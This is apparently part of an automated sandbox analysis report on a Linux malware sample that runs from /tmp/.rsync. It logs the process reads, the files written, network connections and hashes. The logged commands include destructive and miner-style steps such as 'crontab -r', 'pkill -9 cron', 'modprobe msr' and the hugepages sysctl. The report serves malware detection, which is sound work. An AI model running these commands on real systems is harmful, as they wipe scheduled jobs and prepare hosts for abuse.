File opened for reading /proc/8/cmdline /bin/ps N/A
File opened for reading /proc/386/cmdline /bin/ps N/A
File opened for reading /proc/756/status /bin/ps N/A
File opened for reading /proc/387/status /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /bin/ps N/A
File opened for reading /proc/170/cmdline /usr/bin/pkill N/A
File opened for reading /proc/723/status /usr/bin/pkill N/A
File opened for reading /proc/24/cmdline /bin/ps N/A
File opened for reading /proc/72/status /usr/bin/pkill N/A
File opened for reading /proc/14/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/170/stat /bin/ps N/A
File opened for reading /proc/384/status /bin/ps N/A
File opened for reading /proc/81/status /usr/bin/pkill N/A
File opened for reading /proc/269/status /usr/bin/pkill N/A
File opened for reading /proc/676/status /usr/bin/pkill N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/73/status /bin/ps N/A
File opened for reading /proc/667/status /bin/ps N/A
File opened for reading /proc/725/stat /bin/ps N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /bin/ps N/A
File opened for reading /proc/16/status /bin/ps N/A
File opened for reading /proc/727/status /usr/bin/pkill N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/18/stat /bin/ps N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/731/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/727/cmdline /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/387/stat /bin/ps N/A
File opened for reading /proc/151/status /usr/bin/pkill N/A
File opened for reading /proc/363/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/1126/status /usr/bin/pkill N/A
File opened for reading /proc/1130/status /bin/ps N/A
File opened for reading /proc/89/cmdline /usr/bin/pkill N/A
File opened for reading /proc/202/status /usr/bin/pkill N/A
File opened for reading /proc/1193/status /usr/bin/pkill N/A
File opened for reading /proc/170/stat /bin/ps N/A
File opened for reading /proc/445/cmdline /bin/ps N/A
File opened for reading /proc/137/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1352/status /usr/bin/pkill N/A
File opened for reading /proc/1262/stat /usr/bin/killall N/A
File opened for reading /proc/1044/status /bin/ps N/A
File opened for reading /proc/1372/stat /bin/ps N/A
File opened for reading /proc/30/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1114/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1167/status /bin/ps N/A
File opened for reading /proc/1223/cmdline /bin/ps N/A
File opened for reading /proc/203/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1294/stat /usr/bin/killall N/A
File opened for reading /proc/1496/stat /usr/bin/killall N/A
File opened for reading /proc/317/stat /bin/ps N/A
File opened for reading /proc/953/status /bin/ps N/A
File opened for reading /proc/26/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1130/status /usr/bin/pkill N/A
File opened for reading /proc/1262/status /usr/bin/pkill N/A
File opened for reading /proc/1122/status /bin/ps N/A
File opened for reading /proc/1186/stat /bin/ps N/A
File opened for reading /proc/1494/stat /bin/ps N/A
File opened for reading /proc/684/status /usr/bin/pkill N/A
File opened for reading /proc/914/stat /usr/bin/killall N/A
File opened for reading /proc/1038/stat /usr/bin/killall N/A
File opened for reading /proc/1085/status /bin/ps N/A
File opened for reading /proc/1247/stat /bin/ps N/A
File opened for reading /proc/914/status /bin/ps N/A
File opened for reading /proc/1147/status /bin/ps N/A
File opened for reading /proc/30/status /usr/bin/pkill N/A
File opened for reading /proc/312/cmdline /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /bin/ps N/A
File opened for reading /proc/655/status /bin/ps N/A
File opened for reading /proc/914/stat /bin/ps N/A
File opened for reading /proc/1182/stat /usr/bin/killall N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/18/stat /bin/ps N/A
File opened for reading /proc/1183/stat /bin/ps N/A
File opened for reading /proc/7/cmdline /bin/ps N/A
File opened for reading /proc/16/stat /bin/ps N/A
File opened for reading /proc/1044/cmdline /bin/ps N/A
File opened for reading /proc/1061/cmdline /bin/ps N/A
File opened for reading /proc/1143/status /bin/ps N/A
File opened for reading /proc/1072/stat /bin/ps N/A
File opened for reading /proc/1126/stat /bin/ps N/A
File opened for reading /proc/471/status /usr/bin/pkill N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/26/status /bin/ps N/A
File opened for reading /proc/171/stat /bin/ps N/A
File opened for reading /proc/78/cmdline /usr/bin/pkill N/A
File opened for reading /proc/245/stat /bin/ps N/A
File opened for reading /proc/708/status /bin/ps N/A
File opened for reading /proc/13/status /usr/bin/pkill N/A
File opened for reading /proc/158/status /usr/bin/pkill N/A
File opened for reading /proc/31/cmdline /bin/ps N/A
File opened for reading /proc/202/cmdline /bin/ps N/A
File opened for reading /proc/1505/cmdline /bin/ps N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/413/stat /usr/bin/killall N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/bin/ps

[ps x]

/bin/rm

[rm -rf .proc]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.20:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.16:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:54

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/lib/32/libc.so.6]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libc.so.6

[/tmp/.rsync/c/lib/32/libc.so.6]

Network

N/A

Files

N/A